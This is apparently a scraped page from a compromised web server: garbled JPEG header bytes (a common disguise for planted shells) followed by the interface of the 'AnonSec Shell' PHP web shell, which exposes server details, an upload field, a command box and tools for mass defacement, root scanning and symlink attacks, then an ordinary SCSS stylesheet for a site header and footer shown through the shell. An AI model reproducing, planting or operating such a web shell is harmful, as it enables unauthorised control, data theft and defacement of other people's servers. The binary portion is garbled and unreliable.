JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.197.30   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_header.scss
#header {
    position: fixed;
    width: 100%;
    z-index: 10;
    top: 0;
    left: 0;
    padding: 20px 0;
    padding-bottom: 50px;
    font-size: 14px;
    @include transition(0.3s);
    
   
    .logo {
        width: 56px;
        img {
            width: 100%;
        }
    }
    .nav {
        a {
            display: inline-block;
            margin: 0 20px;
            padding: 5px 10px;
            color: #ADB1B2;
            position: relative;
            border-bottom: 2px solid;
            border-color: transparent;
            @include transition(0.3s);
            &:hover {
                color: #000;
            }
            &.active, 
            &.selected{
                color: #000;
                font-weight: bold;
                border-color: #CAA231;
            }
        }
        
        .menu-more {
            display: inline-block;
            position: relative;
        }
        .chevron {
            background-image: url('../img/arrow-down-grey.png');
            background-repeat: no-repeat;
            background-size: cover;
            width: 10px;
            height: 10px;
            display: inline-block;
        }
        .sub-menu {
            @include transition(0.3s);
            display: none;
            position: absolute;
            width: 300px;
            top: 40px;
            left: 20px;
            background-color: #202020;
            border-radius: 8px;
            padding: 10px 12px 10px 12px;
            color: #fff;
            box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
            &:before {
                content: "";
                display: block;
                width: 25px;
                height: 25px;
                background-image: url('../img/triangle-black.png');
                background-repeat: no-repeat;
                background-size: 25px;
                position: absolute;
                top: -10px;
                left: 20px;
            }
            a {
                display: block;
                color: #fff;
                padding: 8px 12px;
                background-image: url('../img/arrow-right-white.png');
                background-position: calc(100% - 10px);
                background-repeat: no-repeat;
                background-size: 15px;
                border-radius: 8px;
                margin: 0;
                margin-bottom: 2px;
                @include transition(0.3s);
                &:hover {
                    background-color: #3E3E3E;
                    color: #fff !important;
                    background-image: url('../img/arrow-right-gold.png');
                }
            }

        }
        .btn-account {
            position: relative;
            img {
                filter: invert(0%) !important;
            }
        }
    }
    .lang {
        margin-right: 20px;
        margin-top: 3px;
        font-size: 14px;
        color: #ADB1B2;
        @include transition(0.3s);
        a {
            color: #ADB1B2;
            @include transition(0.3s);
            &:hover,
            &.active {
                color: #000;
            }
        }
    }
    .btn-white {
        color: #BA251B;
        background-color: #fff;
        margin-left: 10px;
    }
    .click-sub {
        cursor: pointer;
    }

    &.grad {
        background: linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 1) 100%);
        background: -moz-linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 1) 100%);
        background: -webkit-linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 1) 100%);
        .nav {
            a {
                &:hover {
                    color: #000;
                }
                &.active{
                    color: #fff;
                    font-weight: bold;
                    border-color: #CAA231;
                }
            }
        }
        .btn-white {
            color: #fff;
            background-color: rgba($color: #fff, $alpha: 0.2);
            margin-left: 10px;
        }
        .lang {
            a {
                &:hover,
                &.active {
                    color: #fff;
                }
            }
        }
        .btn-account {
            position: relative;
            img {
                filter: invert(100%) !important;
            }
        }
    }

    &.black {
        .nav {
            a {
                &:hover {
                    color: #000;
                }
                &.active{
                    color: #fff;
                    font-weight: bold;
                    border-color: #CAA231;
                }
            }
        }
        .btn-white {
            color: #fff;
            background-color: rgba($color: #fff, $alpha: 0.2);
            margin-left: 10px;
        }
        .lang {
            a {
                &:hover,
                &.active {
                    color: #fff;
                }
            }
        }
        .btn-account {
            position: relative;
            img {
                filter: invert(100%) !important;
            }
        }
    }
    &.stay {
        background: linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 0) 100%);
        background: -moz-linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 0) 100%);
        background: -webkit-linear-gradient(90deg, hsla(0, 0%, 100%, 0) 35%, hsla(0, 0%, 0%, 0) 100%);
        background-color: rgba($color: #F9F8EF, $alpha: 0.9);
        -webkit-backdrop-filter: saturate(180%) blur(20px);
        backdrop-filter: saturate(180%) blur(20px);
        padding: 10px 0;
        .nav {
            a {
                &:hover {
                    color: #000;
                }
                &.active{
                    color: #000;
                    font-weight: bold;
                    border-color: #CAA231;
                }
            }
        }
        .btn-white {
            color: #000;
            background-color: rgba($color: #fff, $alpha: 0.9);
            margin-left: 10px;
        }
        .lang {
            
            a {
                &:hover,
                &.active {
                    color: #000;
                }
            }
        }
        .btn-account {
            position: relative;
            img {
                filter: invert(0%) !important;
            }
            
        }
    }
    &.login {
        .lang {
            
            a {
                &:hover,
                &.active {
                    color: #fff;
                }
            }
        }
    }
    .menu-ham,
    .title-mobile {
        display: none;
    }
}

#footer {
    margin-top: -20px;
    position: relative;
    //margin-top: 30px;
    .container1300  {
        background-color: #FEFCF6;
        background-image: url('../img/bg-footer-right.png');
        background-size: 500px;
        background-repeat: no-repeat;
        background-position: right bottom;
        -webkit-border-top-left-radius: 10px;
        -webkit-border-top-right-radius: 10px;
        -moz-border-radius-topleft: 10px;
        -moz-border-radius-topright: 10px;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
        color: #6A7B81;
        font-size: 14px;
        
    }
    .foot2 {
        padding: 30px;
        .logo {
            width: 100px;
        }
        .desc {
            margin: 20px 0;
        }
        .link-red {
            display: block;
            margin: 5px 0;
            img {
                height: 30px;
                margin-right: 10px;
            }
            color: red;
        }
        .link-footer {
            display: block;
            margin: 5px 0;
            color: #6A7B81;
            img {
                height: 30px;
                margin-right: 10px;
            }
        }
        .footer-phone {
            margin-top: 100px;
            background-color: #F4F2EC;
            border-radius: 100px;
            color: #865B22;
            display: inline-block;
            padding: 10px;
            padding-right: 30px;
            font-size: 20px;
            img {
                height: 40px;
                margin-right: 10px;
            }
        }
    }
    .foot-3 {
        padding: 30px;
        a {
            color: #6A7B81;
            margin: 0 10px;
            @include transition(0.3s);
            &:hover {
                text-decoration: underline;
            }
        }
        .sosmed {
            text-align: right;
            transform: translateY(-20px);
            margin-right: 30px;
            a {
                display: inline-block;
                height: 40px;
                margin: 0;
                margin-left: 10px;
                @include transition(0.3s);
                img {
                    height: 100%;
                }
                &:hover {
                    @include scale(1.2);
                }
            }
        }
    }
    .box-black {
        background-color: #000;
        background-image: url('../img/bg-footer-black.jpg');
        background-position: bottom center;
        background-repeat: no-repeat;
        background-size: cover;
        color: #fff;
        position: relative;
        height: 440px;
        -webkit-border-top-left-radius: 10px;
        -webkit-border-top-right-radius: 10px;
        -moz-border-radius-topleft: 10px;
        -moz-border-radius-topright: 10px;
        border-top-left-radius: 10px;
        border-top-right-radius: 10px;
        overflow: hidden;
        .text {
            position: absolute;
            width: 50%;
            left: 25%;
            top: 30%;
            text-align: center;
            font-size: 32px;
            z-index: 2;
            b {
                color:#DDC867 ;
                font-weight: normal;
            }
        }
        .img {
            position: absolute;
            width: 100%;
            height: 100%;
            left: 0;
            top: 0;
            img {
                position: absolute;
                border-radius: 8px;
            }
            .img1 {
                width: 160px;
                left: 5%;
                top: 10%;
            }
            .img2 {
                width: 180px;
                right: 2%;
                top: 8%;
            }
            .img3 {
                width: 260px;
                left: 8%;
                bottom: 5%;
            }
            .img4 {
                width: 320px;
                right: 2%;
                bottom: 5%;
            }
        }
    }
}

.sub-menu {
    @include transition(0.3s);
    display: none;
    position: absolute;
    width: 200px;
    top: 40px;
    left: 20px;
    background-color: #202020;
    border-radius: 8px;
    padding: 10px 12px 10px 12px;
    color: #fff;
    box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
    text-align: left;
    &:before {
        content: "";
        display: block;
        width: 25px;
        height: 25px;
        background-image: url('../img/triangle-black.png');
        background-repeat: no-repeat;
        background-size: 25px;
        position: absolute;
        top: -10px;
        left: 20px;
    }
    a {
        display: block;
        color: #fff;
        padding: 8px 12px;
        background-image: url('../img/arrow-right-white.png');
        background-position: calc(100% - 10px);
        background-repeat: no-repeat;
        background-size: 15px;
        border-radius: 8px;
        margin: 0;
        margin-bottom: 2px;
        @include transition(0.3s);
        &:hover {
            background-color: #3E3E3E;
            color: #fff !important;
            background-image: url('../img/arrow-right-gold.png');
        }
    }

}

Anon7 - 2022
AnonSec Team